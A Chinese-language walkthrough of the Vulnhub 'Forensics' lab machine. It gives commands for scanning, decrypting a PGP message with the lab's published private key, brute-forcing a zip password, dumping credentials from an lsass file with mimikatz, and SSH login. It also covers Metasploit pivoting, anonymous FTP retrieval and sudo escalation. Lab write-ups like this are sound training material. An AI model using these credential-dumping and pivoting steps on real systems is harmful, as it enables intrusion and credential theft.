Vulnhub靶机实战-Forensics
声明
好好学习,天天向上
搭建
vmware打开,网络和攻击机一样,桥接模式
渗透
存活扫描,发现目标
arp-scan -l
端口扫描
nmap -T4 -A 192.168.31.152 -p 1-65535 -oN nmap.A
开启端口
发现开启80,22,很简单的两个端口
访问80
http://192.168.31.152
点一下右上角的get flag,真骚气
网站上图片好多呀,邮件查看源代码,发现images目录,访问一下
把这些图片都下载下来,看看fingerprint这个指纹,使用file命令查看,发现flag
dirb扫描txt后缀,发现tips.txt
dirb http://192.168.31.152 -X .txt
http://192.168.31.152/tips.txt
发现两个路径
/flag.zip
/igolder
访问发现,一个zip,一个txt都下载下来
在线解密网址
https://youritmate.us/pgp/
滑到最下面粉红色处,输入message和私钥,使用私钥解密
Your encrypted message:填
-----BEGIN PGP MESSAGE-----
Version: BCPG C# v1.6.1.0hQEMA10YY4bPiiBWAQf8DaEoVUWpzj5+3WMZcOhjfXo6Hk+MKD5TLWy5XndaEXRZ
3+aUQuECr88LG83BzmAS1MITHf7xifx4aiqgeM6bGILlvseP9W2Fmv9E5KOVLUYI
T8V3jINwmNg7FinwuYlT2ld2yU1qMwiEZ8GPTK4U90WSZh+/dYnKTVKxjdEZXlj9
FF42BygUxjJgEDFQi0HhUb7AX+tYQIQV0p5DZcTETZweyM9OBcwuhwzspjKp3Rz9
zFcnnCEZ4+JbdXTcXPD9cTBHJhWk01lclg+XR4v572HilznzWFutqcWrMuhBO0UZ
q0v1MOG03o8MN2VysMgbk8gEdOs+GE8fPBtsKqS5tsmhcwZR3QA/BctqAT+IhYtI
s7j0pd+mTG+zvQu5B41isicBb0yLA80YVlfWjjUmZAAF4oowPKJWY9CQIap39Ked
cbLU2+CI3JJf7JZvcZK4KGeuYgpRXU8Jvu3BHSEu1zCHGgieYRW254OJYZcJYFx6
v+6OPq+UNCBbhAFRjJpkOigA+GgH5lGf0vRYM/gz5vA4MDRrEojFs9DIwATbflqN
QOs=
=Y9OD
-----END PGP MESSAGE-----
Your private key:私钥填
-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: BCPG C# v1.6.1.0lQOsBF9sr70BCACvH5Vs2Lp9nyVIbVk4yraUmxDBxPJNitlU/IqcR2d+UDEORbDl
UClLXSqapjBFuu24p86SIcv/1VktRh79lnL5j4uKSAEuI/t6SJW4hlfovVBndUvT
X61w6TRJlLq5AsLOS38PWpIgL1ECIqliwNfCjjlvQd8xm/C9BV1lqM71JYtW34ST
XsKzxomVqGtWvrzs/tFege20z12JtqgPmqGApXzNjI4y7iH0vvVS8nCF58nwyjoH
wbx6EXk002hDe0/W7tsCGhp3gU5wzkUy4kfBfVrLp0/23kA/k4iJvlMPMAeQoJPx
AymXmXEKlp+igBrBicBw68SZgLAQhg8ZO2ybABEBAAH/AwMC/MDF76NvTu1gM8Y7
xjKap2L3OY8xeOoAeMQUueabuTP2rl7jB6YfsEcQj4xDjz0SBXIQxP0PziHpXTk3
v5FlH5nhSWZI6OgN0HF6rdjByKT4CNlkt7IVIPEQc7IidQP5K1/YhbghysyYHyBH
3TRAEwJszcjj6TsAOM1mpLXlPweM1sC3ms8xoFVSipPcHviNcQq58zLpGcWvmmuc
ZfqrRBqfpU/wZEmEvcDW1FOCvq/Bqo1psPOXYfI+ul7C0MLObmzi/u2p7EJLwf2E
tGBJ++wLdProHJHovp0WlQSHFamOWmM5p9SAq7lMegvIn3NHe0ZQS2agjBzNiMW5
LK/dZ0i1lX1SSRNNOlLC+Tf/v6bS8gAD+WSGsYEITPcRP2OpCiCBoa4d7GsK7nyF
RHIngmJrp5g1agayG92ahUFRLqQ7KGa+hu3N8/pM+x/dNH1Uw/jhKHsacpgBBCPf
Zs/NZlcMbCI0TD6CFKe2QCEnOW6iLlOEgV2ptEPJLkinaFZ8BEf5HYHUhW1CqwTZ
otvsmzkijYDvaV77zylVqb9gMJelVNWLZG3fcw+eCGF1wBBxno99xcxEgJpzdOeH
TnU3yQ1JllZb/0jQ7vBq22hrOTYo9iRBe/XOnUj1+J8QVynYLcgvEx8I8/tXnfNM
/bQkwbEohnTzklDWWKrqBXlXOTpBKZL4bk+k0U5wMpOQOkCgiHTMmklmAV/+0S/G
5EDrNNdCDCIdtXtAHJjIUtVivNNyQIgVuImYbhbXcSWziX0IT0QkRGSz8a+/MKl3
0yItTNXi/KpnOt+xfvjavzPscXyKyt7+82feOsl4f/jDFZW6P4NifjWGeP+9Q8FA
MPPZ/xDjhIgBvsqLpGDEuYp7VTVxWWIUtzao7P4WzLQAiQEcBBABAgAGBQJfbK+9
AAoJEF0YY4bPiiBW83YH/jU75ZqnBG3yJGOYa7qapXIPc/Dg6jc1FuivWlphZs8C
PSog9kqEqlY3k5OY03YBMIRgWMI2UyCgiSPcgwF8bGXm8hPQgL0QN5cFX7uubH9S
ofeM+SyRRSpuXtcWgljHe6e/ABR533bwLdk6YyHf4YyCxCDxWZRdI/FyoRYrh7q4
CTfgVJoiem1P9sViva28IBJ+H1ctyioWVEkKz1/PW9NBYy9mTbmVlwdWW1IzXRiS
OcXu0tW1rawJ/z5SwCwjKZxvSm2Hfk9eguEojbfPIoXauNRH00u4tEHO6YjD54ZC
DxpZfSHSCsOWEfOAA5EO+uDGSY4+WB6ihKmCV+i68Jc=
=KoPg
-----END PGP PRIVATE KEY BLOCK-----
点击解密后,message出变为明文,告诉我们密码是3位,前三位是for,后三位是数字
In case the forensic investigator forgets his password, this hint can help him, where the password is of 6 characters long , starting 3 characters is the word "for" and the ending 3 characters are numeric
flag.zip是需要密码的,看来需要爆破出这个密码了
先生成字典
crunch 6 6 -t for%%% -o pass.dic
fcrackzip -u -D -p pass.dic flag.zip
拿到windows里面看看,解压出来的pdf里面发现flag
还有一个DMP文件,打开mimikatz,进入命令行输入
sekurlsa::minidump C:\Users\attack\Desktop\delete\lsass.dmp
sekurlsa::logonPasswords full
往下滑看到用户和密码
jasoos
raj
64fbae31cc352fc26af97cbdef151e03
c220d333379050d852f3e65b010a817712b8c176
在线解密
ssh登录
ssh jasoos@192.168.31.152
Password@1
登进去后,发现172开头的IP,该进行横向渗透了
主机存活&端口发现
nmap -sP 172.17.0.1/24
nmap -T4 -A 172.17.0.1 -p 1-65535 -oN nmap.A
nmap -T4 -A 172.17.0.2 -p 1-65535 -oN nmap.A
发现0.2开启了21ftp,进入之
ftp 172.17.0.2
不太好用,转用msf,内网渗透还是msf好使
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.31.152
set username jasoos
set password Password@1
exploit
session -u 1
use post/multi/manage/autoroute
set session 2
exploit
session -u 2
使用ping去扫描存活主机(session设置成和上面那个一样)
use post/multi/gather/ping_sweep
set session 1
set rhosts 172.17.0.0/24
exploit
扫描端口发现ftp,扫描ftp发现匿名访问
use auxiliary/scanner/portscan/tcp
set rhosts 172.17.0.2
set port 1-100
exploit
use auxiliary/scanner/ftp/anonymous
set rhosts 172.17.0.2
exploit
使用刚刚的ssh,进入ftp查看文件:
ftp 172.17.0.2
anonymous
ls
cd pub
ls
get saboot.001
下载到了靶机本地,需要靶机开启http,然后才能下载到攻击机本地
python -m SimpleHTTPServer
访问
http://192.168.31.152:8000
拿到flag3
解密creds.txt里面的文件内容
amVlbmFsaWlzYWdvb2RnaXJs
base64解密后
jeenaliisagoodgirl
su到用户forensic
su forensic
jeenaliisagoodgirl
sudo -l具有root权限
sudo su root
拿到flag
总结
1.信息收集
发现80和22
80中源码包含敏感目录,查看敏感目录发现图片,查看图片属性拿到flag
dirb扫描txt后缀目录,发现敏感目录,里面后一个zip包和一个PGP的私钥+密文,在线PGP解密后,解压缩zip包发现flag以及DMP文件
2.web权限
无
3.shell权限
使用mimikatz打开DMP文件,发现用户+密码,解密密码后,ssh登录
通过横向渗透,发现另一台主机有ftp服务,匿名进入ftp服务,发现压缩包,下载到本地,解压后发现flag和密码密文,解密后su到这个用户
4.权限维持
无
5.提权
通过sudo直接su到root,拿到flag
Vulnhub靶机实战-Forensics相关推荐
- 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】
靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...
- Vulnhub靶机实战——DC-8
靶机DC-8下载地址: https://download.vulnhub.com/dc/DC-8.zip 环境:VMware 15虚拟机软件 DC-8靶机IP地址:192.168.220.156 Ka ...
- Vulnhub靶机实战——DC-5
靶机DC-5下载地址:https://download.vulnhub.com/dc/DC-5.zip 环境:VMware 15虚拟机软件 DC-5靶机IP地址:192.168.220.139 Kal ...
- Vulnhub靶机实战——Matrix2
Matrix2靶机下载地址: https://download.vulnhub.com/matrix/matrix2-Unknowndevice64.ova 环境: VMware 15虚拟机软件 Ma ...
- 挑战全网最详细靶机教程——vulnhub靶机实战 lampiao【适合刚接触的新人学习】
靶机地址:https://www.vulnhub.com/entry/lampiao-1,249/ 靶机难度:中等 工具:kalilinux: 一个灵活的脑子 : 一双手 目标:得到root权限&am ...
- 挑战全网最详细靶机教程——vulnhub靶机实战vulnhub Tr0ll: 1【适合刚接触的新人学习】
靶机地址:https://www.vulnhub.com/entry/tr0ll-1,100/ 靶机难度:简单 靶机发布日期:2014年8月14日 靶机描述:Tr0ll的灵感来自OSCP实验室中不断摇 ...
- Vulnhub靶机实战——Matrix3
下载地址: https://download.vulnhub.com/matrix/Machine_Matrix_v3.ova 环境: VMware 15虚拟机软件 Matrix3靶机IP地址:192 ...
- Vulnhub靶机实战——DC-3
靶机DC-3下载地址:https : //download.vulnhub.com/dc/DC-3.zip 靶机DC-3VMware下载地址:https : //download.vulnhub.co ...
- DC-5 vulnhub靶机实战
首先是使用virtualbox安装,这里不推荐vmware,会出很多问题. nmap扫一下子网,看靶机的ip地址: 发现ip是192.168.240.137,开放了80和111端口. 给了提示是个文件 ...
最新文章
- 1008. 数组元素循环右移问题 (20)
- c++常见操作的模板
- AAAI 2019 《LiveBot: Generating Live Video Comments Based on Visual and Textual Contexts》论文笔记
- C语言中fun的功能是将字符串,下列给定的程序中,fun()函数的功能是:将p所指字符串中......
- java ee 的使用方法_改善Java EE生产支持技能的8种方法
- 海湾监控计算机,海湾GST-DH9300电气火灾监控图形显示系统软件
- ubuntu16.04 安装完显卡驱动后分辨率固定640x480 解决
- win、linux下tomcat内存的修改
- 基于C语言的图形化编程软件,图形化编程工具
- 猎豹网校 ASP.NET全套教程
- 人口普查数据有疑问???
- fastboot与fastbootd介绍
- 《东周列国志》第九十六回 蔺相如两屈秦王 马服君单解韩围
- BGP Dampening Cyrus
- html的英文全称怎么读,HTML标签英文全称对照.doc
- 成功就是一种自我满足
- 施工企业安全教育培训数字化解决方案
- 参加情商管理与沟通技巧培训的感受(1)
- 逼真的合成语音,独家出品,这款真香作品更新了!
- 2016 CCF大数据与计算智能大赛 开源资料整理
热门文章
- linux系统外接硬盘_Mac的外置硬盘上如何去安装Linux系统
- 读《鲁冰逊漂流记》知识归纳思维导图模板
- 群辉 虚拟linux,黑群晖DSM6.2.1在centos7的KVM里面总是crash
- 视频直播搭建(个人记录)
- 用 Qt 控制 Nikon 显微镜的电动物镜转盘
- linux 负载高 标准,linux 系统负载高 如何检查
- 2.6.3 FTTx技术
- 126邮箱页面源码的思考
- html 显示视频列表,dvd光碟制作节目轨菜单布局,不要视频缩略图,只显示文件列表...
- 1、通过 BitNami 部署 RedMine